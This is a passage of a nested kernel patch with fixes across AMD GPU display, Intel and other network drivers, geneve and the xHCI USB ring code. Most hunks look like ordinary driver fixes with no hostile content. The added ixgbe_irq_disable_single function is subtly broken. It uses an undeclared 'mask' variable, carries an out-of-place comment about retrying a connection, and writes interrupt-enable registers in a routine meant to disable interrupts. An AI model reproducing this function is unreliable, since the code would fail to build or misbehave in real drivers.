++	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++	WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
++
+ out:
+ 	return (wptr & ih->ptr_mask);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/vega20_ih.c b/drivers/gpu/drm/amd/amdgpu/vega20_ih.c
+index 59dfca093155c..f1ba76c35cd6e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/vega20_ih.c
++++ b/drivers/gpu/drm/amd/amdgpu/vega20_ih.c
+@@ -424,6 +424,12 @@ static u32 vega20_ih_get_wptr(struct amdgpu_device *adev,
+ 	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 1);
+ 	WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
+ 
++	/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++	 * can be detected.
++	 */
++	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++	WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
++
+ out:
+ 	return (wptr & ih->ptr_mask);
+ }
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index da16048bf1004..a6c6f286a5988 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -5938,6 +5938,7 @@ create_stream_for_sink(struct amdgpu_dm_connector *aconnector,
+ 	bool scale = dm_state ? (dm_state->scaling != RMX_OFF) : false;
+ 	int mode_refresh;
+ 	int preferred_refresh = 0;
++	enum color_transfer_func tf = TRANSFER_FUNC_UNKNOWN;
+ #if defined(CONFIG_DRM_AMD_DC_DCN)
+ 	struct dsc_dec_dpcd_caps dsc_caps;
+ #endif
+@@ -6071,7 +6072,9 @@ create_stream_for_sink(struct amdgpu_dm_connector *aconnector,
+ 			if (stream->link->dpcd_caps.dprx_feature.bits.VSC_SDP_COLORIMETRY_SUPPORTED)
+ 				stream->use_vsc_sdp_for_colorimetry = true;
+ 		}
+-		mod_build_vsc_infopacket(stream, &stream->vsc_infopacket, stream->output_color_space);
++		if (stream->out_transfer_func->tf == TRANSFER_FUNCTION_GAMMA22)
++			tf = TRANSFER_FUNC_GAMMA_22;
++		mod_build_vsc_infopacket(stream, &stream->vsc_infopacket, stream->output_color_space, tf);
+ 		aconnector->psr_skip_count = AMDGPU_DM_PSR_ENTRY_DELAY;
+ 
+ 	}
+@@ -10120,11 +10123,13 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 		}
+ 
+ #if defined(CONFIG_DRM_AMD_DC_DCN)
+-		ret = compute_mst_dsc_configs_for_state(state, dm_state->context, vars);
+-		if (ret) {
+-			DRM_DEBUG_DRIVER("compute_mst_dsc_configs_for_state() failed\n");
+-			ret = -EINVAL;
+-			goto fail;
++		if (dc_resource_is_dsc_encoding_supported(dc)) {
++			ret = compute_mst_dsc_configs_for_state(state, dm_state->context, vars);
++			if (ret) {
++				DRM_DEBUG_DRIVER("compute_mst_dsc_configs_for_state() failed\n");
++				ret = -EINVAL;
++				goto fail;
++			}
+ 		}
+ 
+ 		ret = dm_update_mst_vcpi_slots_for_dsc(state, dm_state->context, vars);
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link_dpcd.c b/drivers/gpu/drm/amd/display/dc/core/dc_link_dpcd.c
+index af110bf9470fa..aefca9756dbe8 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link_dpcd.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link_dpcd.c
+@@ -202,7 +202,7 @@ enum dc_status core_link_read_dpcd(
+ 	uint32_t extended_size;
+ 	/* size of the remaining partitioned address space */
+ 	uint32_t size_left_to_read;
+-	enum dc_status status;
++	enum dc_status status = DC_ERROR_UNEXPECTED;
+ 	/* size of the next partition to be read from */
+ 	uint32_t partition_size;
+ 	uint32_t data_index = 0;
+@@ -231,7 +231,7 @@ enum dc_status core_link_write_dpcd(
+ {
+ 	uint32_t partition_size;
+ 	uint32_t data_index = 0;
+-	enum dc_status status;
++	enum dc_status status = DC_ERROR_UNEXPECTED;
+ 
+ 	while (size) {
+ 		partition_size = dpcd_get_next_partition_size(address, size);
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+index 66923f51037a3..e2f80cd0ca8cb 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+@@ -3038,6 +3038,12 @@ static void set_avi_info_frame(
+ 		hdmi_info.bits.C0_C1   = COLORIMETRY_EXTENDED;
+ 	}
+ 
++	if (pixel_encoding && color_space == COLOR_SPACE_2020_YCBCR &&
++			stream->out_transfer_func->tf == TRANSFER_FUNCTION_GAMMA22) {
++		hdmi_info.bits.EC0_EC2 = 0;
++		hdmi_info.bits.C0_C1 = COLORIMETRY_ITU709;
++	}
++
+ 	/* TODO: un-hardcode aspect ratio */
+ 	aspect = stream->timing.aspect_ratio;
+ 
+diff --git a/drivers/gpu/drm/amd/display/modules/inc/mod_info_packet.h b/drivers/gpu/drm/amd/display/modules/inc/mod_info_packet.h
+index 1d8b746b02f24..edf5845f6a1f7 100644
+--- a/drivers/gpu/drm/amd/display/modules/inc/mod_info_packet.h
++++ b/drivers/gpu/drm/amd/display/modules/inc/mod_info_packet.h
+@@ -35,7 +35,8 @@ struct mod_vrr_params;
+ 
+ void mod_build_vsc_infopacket(const struct dc_stream_state *stream,
+ 		struct dc_info_packet *info_packet,
+-		enum dc_color_space cs);
++		enum dc_color_space cs,
++		enum color_transfer_func tf);
+ 
+ void mod_build_hf_vsif_infopacket(const struct dc_stream_state *stream,
+ 		struct dc_info_packet *info_packet);
+diff --git a/drivers/gpu/drm/amd/display/modules/info_packet/info_packet.c b/drivers/gpu/drm/amd/display/modules/info_packet/info_packet.c
+index 27ceba9d6d658..69691058ab898 100644
+--- a/drivers/gpu/drm/amd/display/modules/info_packet/info_packet.c
++++ b/drivers/gpu/drm/amd/display/modules/info_packet/info_packet.c
+@@ -132,7 +132,8 @@ enum ColorimetryYCCDP {
+ 
+ void mod_build_vsc_infopacket(const struct dc_stream_state *stream,
+ 		struct dc_info_packet *info_packet,
+-		enum dc_color_space cs)
++		enum dc_color_space cs,
++		enum color_transfer_func tf)
+ {
+ 	unsigned int vsc_packet_revision = vsc_packet_undefined;
+ 	unsigned int i;
+@@ -382,6 +383,9 @@ void mod_build_vsc_infopacket(const struct dc_stream_state *stream,
+ 				colorimetryFormat = ColorimetryYCC_DP_AdobeYCC;
+ 			else if (cs == COLOR_SPACE_2020_YCBCR)
+ 				colorimetryFormat = ColorimetryYCC_DP_ITU2020YCbCr;
++
++			if (cs == COLOR_SPACE_2020_YCBCR && tf == TRANSFER_FUNC_GAMMA_22)
++				colorimetryFormat = ColorimetryYCC_DP_ITU709;
+ 			break;
+ 
+ 		default:
+diff --git a/drivers/net/dsa/microchip/ksz8795.c b/drivers/net/dsa/microchip/ksz8795.c
+index c63e082dc57dc..934600eccbaf2 100644
+--- a/drivers/net/dsa/microchip/ksz8795.c
++++ b/drivers/net/dsa/microchip/ksz8795.c
+@@ -49,9 +49,9 @@ static int ksz8_ind_write8(struct ksz_device *dev, u8 table, u16 addr, u8 data)
+ 	mutex_lock(&dev->alu_mutex);
+ 
+ 	ctrl_addr = IND_ACC_TABLE(table) | addr;
+-	ret = ksz_write8(dev, regs[REG_IND_BYTE], data);
++	ret = ksz_write16(dev, regs[REG_IND_CTRL_0], ctrl_addr);
+ 	if (!ret)
+-		ret = ksz_write16(dev, regs[REG_IND_CTRL_0], ctrl_addr);
++		ret = ksz_write8(dev, regs[REG_IND_BYTE], data);
+ 
+ 	mutex_unlock(&dev->alu_mutex);
+ 
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 76455405a6d8e..d8a7fb21b7b76 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -13569,9 +13569,9 @@ int i40e_queue_pair_disable(struct i40e_vsi *vsi, int queue_pair)
+ 		return err;
+ 
+ 	i40e_queue_pair_disable_irq(vsi, queue_pair);
++	i40e_queue_pair_toggle_napi(vsi, queue_pair, false /* off */);
+ 	err = i40e_queue_pair_toggle_rings(vsi, queue_pair, false /* off */);
+ 	i40e_clean_rx_ring(vsi->rx_rings[queue_pair]);
+-	i40e_queue_pair_toggle_napi(vsi, queue_pair, false /* off */);
+ 	i40e_queue_pair_clean_rings(vsi, queue_pair);
+ 	i40e_queue_pair_reset_stats(vsi, queue_pair);
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index ab46cfca4028d..3117f65253b37 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -7681,6 +7681,8 @@ ice_bridge_setlink(struct net_device *dev, struct nlmsghdr *nlh,
+ 	pf_sw = pf->first_sw;
+ 	/* find the attribute in the netlink message */
+ 	br_spec = nlmsg_find_attr(nlh, sizeof(struct ifinfomsg), IFLA_AF_SPEC);
++	if (!br_spec)
++		return -EINVAL;
+ 
+ 	nla_for_each_nested(attr, br_spec, rem) {
+ 		__u16 mode;
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl.c b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+index 6c03ebf81ffda..4b71392f60df1 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+@@ -440,7 +440,6 @@ static int ice_vc_get_vf_res_msg(struct ice_vf *vf, u8 *msg)
+ 		vf->driver_caps = *(u32 *)msg;
+ 	else
+ 		vf->driver_caps = VIRTCHNL_VF_OFFLOAD_L2 |
+-				  VIRTCHNL_VF_OFFLOAD_RSS_REG |
+ 				  VIRTCHNL_VF_OFFLOAD_VLAN;
+ 
+ 	vfres->vf_cap_flags = VIRTCHNL_VF_OFFLOAD_L2;
+@@ -453,14 +452,8 @@ static int ice_vc_get_vf_res_msg(struct ice_vf *vf, u8 *msg)
+ 	vfres->vf_cap_flags |= ice_vc_get_vlan_caps(hw, vf, vsi,
+ 						    vf->driver_caps);
+ 
+-	if (vf->driver_caps & VIRTCHNL_VF_OFFLOAD_RSS_PF) {
++	if (vf->driver_caps & VIRTCHNL_VF_OFFLOAD_RSS_PF)
+ 		vfres->vf_cap_flags |= VIRTCHNL_VF_OFFLOAD_RSS_PF;
+-	} else {
+-		if (vf->driver_caps & VIRTCHNL_VF_OFFLOAD_RSS_AQ)
+-			vfres->vf_cap_flags |= VIRTCHNL_VF_OFFLOAD_RSS_AQ;
+-		else
+-			vfres->vf_cap_flags |= VIRTCHNL_VF_OFFLOAD_RSS_REG;
+-	}
+ 
+ 	if (vf->driver_caps & VIRTCHNL_VF_OFFLOAD_FDIR_PF)
+ 		vfres->vf_cap_flags |= VIRTCHNL_VF_OFFLOAD_FDIR_PF;
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl_allowlist.c b/drivers/net/ethernet/intel/ice/ice_virtchnl_allowlist.c
+index 5a82216e7d034..63e83e8b97e55 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl_allowlist.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl_allowlist.c
+@@ -13,8 +13,6 @@
+  * - opcodes needed by VF when caps are activated
+  *
+  * Caps that don't use new opcodes (no opcodes should be allowed):
+- * - VIRTCHNL_VF_OFFLOAD_RSS_AQ
+- * - VIRTCHNL_VF_OFFLOAD_RSS_REG
+  * - VIRTCHNL_VF_OFFLOAD_WB_ON_ITR
+  * - VIRTCHNL_VF_OFFLOAD_CRC
+  * - VIRTCHNL_VF_OFFLOAD_RX_POLLING
+diff --git a/drivers/net/ethernet/intel/ice/ice_xsk.c b/drivers/net/ethernet/intel/ice/ice_xsk.c
+index 41ee081eb8875..48cf24709fe32 100644
+--- a/drivers/net/ethernet/intel/ice/ice_xsk.c
++++ b/drivers/net/ethernet/intel/ice/ice_xsk.c
+@@ -171,6 +171,10 @@ static int ice_qp_dis(struct ice_vsi *vsi, u16 q_idx)
+ 			return -EBUSY;
+ 		usleep_range(1000, 2000);
+ 	}
++
++	ice_qvec_dis_irq(vsi, rx_ring, q_vector);
++	ice_qvec_toggle_napi(vsi, q_vector, false);
++
+ 	netif_tx_stop_queue(netdev_get_tx_queue(vsi->netdev, q_idx));
+ 
+ 	ice_fill_txq_meta(vsi, tx_ring, &txq_meta);
+@@ -187,13 +191,10 @@ static int ice_qp_dis(struct ice_vsi *vsi, u16 q_idx)
+ 		if (err)
+ 			return err;
+ 	}
+-	ice_qvec_dis_irq(vsi, rx_ring, q_vector);
+-
+ 	err = ice_vsi_ctrl_one_rx_ring(vsi, false, q_idx, true);
+ 	if (err)
+ 		return err;
+ 
+-	ice_qvec_toggle_napi(vsi, q_vector, false);
+ 	ice_qp_clean_rings(vsi, q_idx);
+ 	ice_qp_reset_stats(vsi, q_idx);
+ 
+@@ -256,11 +257,11 @@ static int ice_qp_ena(struct ice_vsi *vsi, u16 q_idx)
+ 	if (err)
+ 		goto free_buf;
+ 
+-	clear_bit(ICE_CFG_BUSY, vsi->state);
+ 	ice_qvec_toggle_napi(vsi, q_vector, true);
+ 	ice_qvec_ena_irq(vsi, q_vector);
+ 
+ 	netif_tx_start_queue(netdev_get_tx_queue(vsi->netdev, q_idx));
++	clear_bit(ICE_CFG_BUSY, vsi->state);
+ free_buf:
+ 	kfree(qg_buf);
+ 	return err;
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 4b6f882b380dc..e052f49cc08d7 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -6330,7 +6330,7 @@ static int igc_xdp_xmit(struct net_device *dev, int num_frames,
+ 	int cpu = smp_processor_id();
+ 	struct netdev_queue *nq;
+ 	struct igc_ring *ring;
+-	int i, drops;
++	int i, nxmit;
+ 
+ 	if (unlikely(!netif_carrier_ok(dev)))
+ 		return -ENETDOWN;
+@@ -6346,16 +6346,15 @@ static int igc_xdp_xmit(struct net_device *dev, int num_frames,
+ 	/* Avoid transmit queue timeout since we share it with the slow path */
+ 	txq_trans_cond_update(nq);
+ 
+-	drops = 0;
++	nxmit = 0;
+ 	for (i = 0; i < num_frames; i++) {
+ 		int err;
+ 		struct xdp_frame *xdpf = frames[i];
+ 
+ 		err = igc_xdp_init_tx_descriptor(ring, xdpf);
+-		if (err) {
+-			xdp_return_frame_rx_napi(xdpf);
+-			drops++;
+-		}
++		if (err)
++			break;
++		nxmit++;
+ 	}
+ 
+ 	if (flags & XDP_XMIT_FLUSH)
+@@ -6363,7 +6362,7 @@ static int igc_xdp_xmit(struct net_device *dev, int num_frames,
+ 
+ 	__netif_tx_unlock(nq);
+ 
+-	return num_frames - drops;
++	return nxmit;
+ }
+ 
+ static void igc_trigger_rxtxq_interrupt(struct igc_adapter *adapter,
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+index 6dc554e810a17..086cc25730338 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+@@ -2947,8 +2947,8 @@ static void ixgbe_check_lsc(struct ixgbe_adapter *adapter)
+ static inline void ixgbe_irq_enable_queues(struct ixgbe_adapter *adapter,
+ 					   u64 qmask)
+ {
+-	u32 mask;
+ 	struct ixgbe_hw *hw = &adapter->hw;
++	u32 mask;
+ 
+ 	switch (hw->mac.type) {
+ 	case ixgbe_mac_82598EB:
+@@ -10543,6 +10543,44 @@ static void ixgbe_reset_rxr_stats(struct ixgbe_ring *rx_ring)
+ 	memset(&rx_ring->rx_stats, 0, sizeof(rx_ring->rx_stats));
+ }
+ 
++/**
++ * ixgbe_irq_disable_single - Disable single IRQ vector
++ * @adapter: adapter structure
++ * @ring: ring index
++ **/
++static void ixgbe_irq_disable_single(struct ixgbe_adapter *adapter, u32 ring)
++{
++	struct ixgbe_hw *hw = &adapter->hw;
++	u64 qmask = BIT_ULL(ring);
++		/* Trigger the connection so that it's ready for the next retry */
++
++	switch (adapter->hw.mac.type) {
++	case ixgbe_mac_82598EB:
++		mask = qmask & IXGBE_EIMC_RTX_QUEUE;
++		IXGBE_WRITE_REG(&adapter->hw, IXGBE_EIMC, mask);
++		break;
++	case ixgbe_mac_82599EB:
++	case ixgbe_mac_X540:
++	case ixgbe_mac_X550:
++	case ixgbe_mac_X550EM_x:
++	case ixgbe_mac_x550em_a:
++		mask = (qmask & 0xFFFFFFFF);
++		if (mask)
++			IXGBE_WRITE_REG(hw, IXGBE_EIMS_EX(0), mask);
++		mask = (qmask >> 32);
++		if (mask)
++			IXGBE_WRITE_REG(hw, IXGBE_EIMS_EX(1), mask);
++		break;
++	default:
++		break;
++	}
++	IXGBE_WRITE_FLUSH(&adapter->hw);
++	if (adapter->flags & IXGBE_FLAG_MSIX_ENABLED)
++		synchronize_irq(adapter->msix_entries[ring].vector);
++	else
++		synchronize_irq(adapter->pdev->irq);
++}
++
+ /**
+  * ixgbe_txrx_ring_disable - Disable Rx/Tx/XDP Tx rings
+  * @adapter: adapter structure
+@@ -10559,6 +10597,11 @@ void ixgbe_txrx_ring_disable(struct ixgbe_adapter *adapter, int ring)
+ 	tx_ring = adapter->tx_ring[ring];
+ 	xdp_ring = adapter->xdp_ring[ring];
+ 
++	ixgbe_irq_disable_single(adapter, ring);
++
++	/* Rx/Tx/XDP Tx share the same napi context. */
++	napi_disable(&rx_ring->q_vector->napi);
++
+ 	ixgbe_disable_txr(adapter, tx_ring);
+ 	if (xdp_ring)
+ 		ixgbe_disable_txr(adapter, xdp_ring);
+@@ -10567,9 +10610,6 @@ void ixgbe_txrx_ring_disable(struct ixgbe_adapter *adapter, int ring)
+ 	if (xdp_ring)
+ 		synchronize_rcu();
+ 
+-	/* Rx/Tx/XDP Tx share the same napi context. */
+-	napi_disable(&rx_ring->q_vector->napi);
+-
+ 	ixgbe_clean_tx_ring(tx_ring);
+ 	if (xdp_ring)
+ 		ixgbe_clean_tx_ring(xdp_ring);
+@@ -10597,9 +10637,6 @@ void ixgbe_txrx_ring_enable(struct ixgbe_adapter *adapter, int ring)
+ 	tx_ring = adapter->tx_ring[ring];
+ 	xdp_ring = adapter->xdp_ring[ring];
+ 
+-	/* Rx/Tx/XDP Tx share the same napi context. */
+-	napi_enable(&rx_ring->q_vector->napi);
+-
+ 	ixgbe_configure_tx_ring(adapter, tx_ring);
+ 	if (xdp_ring)
+ 		ixgbe_configure_tx_ring(adapter, xdp_ring);
+@@ -10608,6 +10645,11 @@ void ixgbe_txrx_ring_enable(struct ixgbe_adapter *adapter, int ring)
+ 	clear_bit(__IXGBE_TX_DISABLED, &tx_ring->state);
+ 	if (xdp_ring)
+ 		clear_bit(__IXGBE_TX_DISABLED, &xdp_ring->state);
++
++	/* Rx/Tx/XDP Tx share the same napi context. */
++	napi_enable(&rx_ring->q_vector->napi);
++	ixgbe_irq_enable_queues(adapter, BIT_ULL(ring));
++	IXGBE_WRITE_FLUSH(&adapter->hw);
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/microchip/sparx5/sparx5_mactable.c b/drivers/net/ethernet/microchip/sparx5/sparx5_mactable.c
+index 4af285918ea2a..75868b3f548ec 100644
+--- a/drivers/net/ethernet/microchip/sparx5/sparx5_mactable.c
++++ b/drivers/net/ethernet/microchip/sparx5/sparx5_mactable.c
+@@ -347,10 +347,10 @@ int sparx5_del_mact_entry(struct sparx5 *sparx5,
+ 				 list) {
+ 		if ((vid == 0 || mact_entry->vid == vid) &&
+ 		    ether_addr_equal(addr, mact_entry->mac)) {
++			sparx5_mact_forget(sparx5, addr, mact_entry->vid);
++
+ 			list_del(&mact_entry->list);
+ 			devm_kfree(sparx5->dev, mact_entry);
+-
+-			sparx5_mact_forget(sparx5, addr, mact_entry->vid);
+ 		}
+ 	}
+ 	mutex_unlock(&sparx5->mact_lock);
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/conntrack.c b/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
+index 7af03b45555dd..497766ecdd91d 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
+@@ -1243,7 +1243,7 @@ static int nfp_ct_do_tc_merge(struct nfp_fl_ct_zone_entry *zt,
+ 	/* Checks that the chain_index of the filter matches the
+ 	 * chain_index of the GOTO action.
+ 	 */
+-	if (post_ct_entry->chain_index != pre_ct_entry->chain_index)
++	if (post_ct_entry->chain_index != pre_ct_entry->goto_chain_index)
+ 		return -EINVAL;
+ 
+ 	err = nfp_ct_merge_check(pre_ct_entry, post_ct_entry);
+@@ -1776,7 +1776,8 @@ int nfp_fl_ct_handle_pre_ct(struct nfp_flower_priv *priv,
+ 	if (IS_ERR(ct_entry))
+ 		return PTR_ERR(ct_entry);
+ 	ct_entry->type = CT_TYPE_PRE_CT;
+-	ct_entry->chain_index = ct_goto->chain_index;
++	ct_entry->chain_index = flow->common.chain_index;
++	ct_entry->goto_chain_index = ct_goto->chain_index;
+ 	list_add(&ct_entry->list_node, &zt->pre_ct_list);
+ 	zt->pre_ct_count++;
+ 
+@@ -1796,9 +1797,30 @@ int nfp_fl_ct_handle_post_ct(struct nfp_flower_priv *priv,
+ {
+ 	struct flow_rule *rule = flow_cls_offload_flow_rule(flow);
+ 	struct nfp_fl_ct_flow_entry *ct_entry;
++	struct flow_action_entry *ct_goto;
+ 	struct nfp_fl_ct_zone_entry *zt;
++	struct flow_action_entry *act;
+ 	bool wildcarded = false;
+ 	struct flow_match_ct ct;
++	int i;
++
++	flow_action_for_each(i, act, &rule->action) {
++		switch (act->id) {
++		case FLOW_ACTION_REDIRECT:
++		case FLOW_ACTION_REDIRECT_INGRESS:
++		case FLOW_ACTION_MIRRED:
++		case FLOW_ACTION_MIRRED_INGRESS:
++			if (act->dev->rtnl_link_ops &&
++			    !strcmp(act->dev->rtnl_link_ops->kind, "openvswitch")) {
++				NL_SET_ERR_MSG_MOD(extack,
++						   "unsupported offload: out port is openvswitch internal port");
++				return -EOPNOTSUPP;
++			}
++			break;
++		default:
++			break;
++		}
++	}
+ 
+ 	flow_rule_match_ct(rule, &ct);
+ 	if (!ct.mask->ct_zone) {
+@@ -1823,6 +1845,8 @@ int nfp_fl_ct_handle_post_ct(struct nfp_flower_priv *priv,
+ 
+ 	ct_entry->type = CT_TYPE_POST_CT;
+ 	ct_entry->chain_index = flow->common.chain_index;
++	ct_goto = get_flow_act(flow->rule, FLOW_ACTION_GOTO);
++	ct_entry->goto_chain_index = ct_goto ? ct_goto->chain_index : 0;
+ 	list_add(&ct_entry->list_node, &zt->post_ct_list);
+ 	zt->post_ct_count++;
+ 
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/conntrack.h b/drivers/net/ethernet/netronome/nfp/flower/conntrack.h
+index 762c0b36e269b..9440ab776ecea 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/conntrack.h
++++ b/drivers/net/ethernet/netronome/nfp/flower/conntrack.h
+@@ -112,6 +112,7 @@ enum nfp_nfp_layer_name {
+  * @cookie:	Flow cookie, same as original TC flow, used as key
+  * @list_node:	Used by the list
+  * @chain_index:	Chain index of the original flow
++ * @goto_chain_index:	goto chain index of the flow
+  * @netdev:	netdev structure.
+  * @type:	Type of pre-entry from enum ct_entry_type
+  * @zt:		Reference to the zone table this belongs to
+@@ -125,6 +126,7 @@ struct nfp_fl_ct_flow_entry {
+ 	unsigned long cookie;
+ 	struct list_head list_node;
+ 	u32 chain_index;
++	u32 goto_chain_index;
+ 	enum ct_entry_type type;
+ 	struct net_device *netdev;
+ 	struct nfp_fl_ct_zone_entry *zt;
+diff --git a/drivers/net/geneve.c b/drivers/net/geneve.c
+index f393e454f45ca..3f8da6f0b25ce 100644
+--- a/drivers/net/geneve.c
++++ b/drivers/net/geneve.c
+@@ -221,7 +221,7 @@ static void geneve_rx(struct geneve_dev *geneve, struct geneve_sock *gs,
+ 	struct genevehdr *gnvh = geneve_hdr(skb);
+ 	struct metadata_dst *tun_dst = NULL;
+ 	unsigned int len;
+-	int err = 0;
++	int nh, err = 0;
+ 	void *oiph;
+ 
+ 	if (ip_tunnel_collect_metadata() || gs->collect_md) {
+@@ -272,9 +272,23 @@ static void geneve_rx(struct geneve_dev *geneve, struct geneve_sock *gs,
+ 		skb->pkt_type = PACKET_HOST;
+ 	}
+ 
+-	oiph = skb_network_header(skb);
++	/* Save offset of outer header relative to skb->head,
++	 * because we are going to reset the network header to the inner header
++	 * and might change skb->head.
++	 */
++	nh = skb_network_header(skb) - skb->head;
++
+ 	skb_reset_network_header(skb);
+ 
++	if (!pskb_inet_may_pull(skb)) {
++		DEV_STATS_INC(geneve->dev, rx_length_errors);
++		DEV_STATS_INC(geneve->dev, rx_errors);
++		goto drop;
++	}
++
++	/* Get the outer header. */
++	oiph = skb->head + nh;
++
+ 	if (geneve_get_sk_family(gs) == AF_INET)
+ 		err = IP_ECN_decapsulate(oiph, skb);
+ #if IS_ENABLED(CONFIG_IPV6)
+diff --git a/drivers/net/usb/lan78xx.c b/drivers/net/usb/lan78xx.c
+index 4fd4563811299..366e83ed0a973 100644
+--- a/drivers/net/usb/lan78xx.c
++++ b/drivers/net/usb/lan78xx.c
+@@ -3137,7 +3137,8 @@ static int lan78xx_open(struct net_device *net)
+ done:
+ 	mutex_unlock(&dev->dev_mutex);
+ 
+-	usb_autopm_put_interface(dev->intf);
++	if (ret < 0)
++		usb_autopm_put_interface(dev->intf);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index 1239e06dfe411..239b5edee3268 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -2363,6 +2363,9 @@ static int process_isoc_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 	/* handle completion code */
+ 	switch (trb_comp_code) {
+ 	case COMP_SUCCESS:
++		/* Don't overwrite status if TD had an error, see xHCI 4.9.1 */
++		if (td->error_mid_td)
++			break;
+ 		if (remaining) {
+ 			frame->status = short_framestatus;
+ 			if (xhci->quirks & XHCI_TRUST_TX_LENGTH)
+@@ -2378,9 +2381,13 @@ static int process_isoc_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 	case COMP_BANDWIDTH_OVERRUN_ERROR:
+ 		frame->status = -ECOMM;
+ 		break;
+-	case COMP_ISOCH_BUFFER_OVERRUN:
+ 	case COMP_BABBLE_DETECTED_ERROR:
++		sum_trbs_for_length = true;
++		fallthrough;
++	case COMP_ISOCH_BUFFER_OVERRUN:
+ 		frame->status = -EOVERFLOW;
++		if (ep_trb != td->last_trb)
++			td->error_mid_td = true;
+ 		break;
+ 	case COMP_INCOMPATIBLE_DEVICE_ERROR:
+ 	case COMP_STALL_ERROR:
+@@ -2388,8 +2395,9 @@ static int process_isoc_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 		break;
+ 	case COMP_USB_TRANSACTION_ERROR:
+ 		frame->status = -EPROTO;
++		sum_trbs_for_length = true;
+ 		if (ep_trb != td->last_trb)
+-			return 0;
++			td->error_mid_td = true;
+ 		break;
+ 	case COMP_STOPPED:
+ 		sum_trbs_for_length = true;
+@@ -2409,6 +2417,9 @@ static int process_isoc_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 		break;
+ 	}
+ 
++	if (td->urb_length_set)
++		goto finish_td;
++
+ 	if (sum_trbs_for_length)
+ 		frame->actual_length = sum_trb_lengths(xhci, ep->ring, ep_trb) +
+ 			ep_trb_len - remaining;
+@@ -2417,6 +2428,14 @@ static int process_isoc_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 
+ 	td->urb->actual_length += frame->actual_length;
+ 
++finish_td:
++	/* Don't give back TD yet if we encountered an error mid TD */
++	if (td->error_mid_td && ep_trb != td->last_trb) {
++		xhci_dbg(xhci, "Error mid isoc TD, wait for final completion event\n");
++		td->urb_length_set = true;
++		return 0;
++	}
++
+ 	return finish_td(xhci, ep, ep_ring, td, trb_comp_code);
+ }
+ 
+@@ -2801,17 +2820,51 @@ static int handle_tx_event(struct xhci_hcd *xhci,
+ 		}
+ 
+ 		if (!ep_seg) {
+-			if (!ep->skip ||
+-			    !usb_endpoint_xfer_isoc(&td->urb->ep->desc)) {
+-				/* Some host controllers give a spurious
+-				 * successful event after a short transfer.
+-				 * Ignore it.
+-				 */
+-				if ((xhci->quirks & XHCI_SPURIOUS_SUCCESS) &&
+-						ep_ring->last_td_was_short) {
+-					ep_ring->last_td_was_short = false;
+-					goto cleanup;
++
++			if (ep->skip && usb_endpoint_xfer_isoc(&td->urb->ep->desc)) {
++				skip_isoc_td(xhci, td, ep, status);
++				goto cleanup;
++			}
++
++			/*
++			 * Some hosts give a spurious success event after a short
++			 * transfer. Ignore it.
++			 */
++			if ((xhci->quirks & XHCI_SPURIOUS_SUCCESS) &&
++			    ep_ring->last_td_was_short) {
++				ep_ring->last_td_was_short = false;
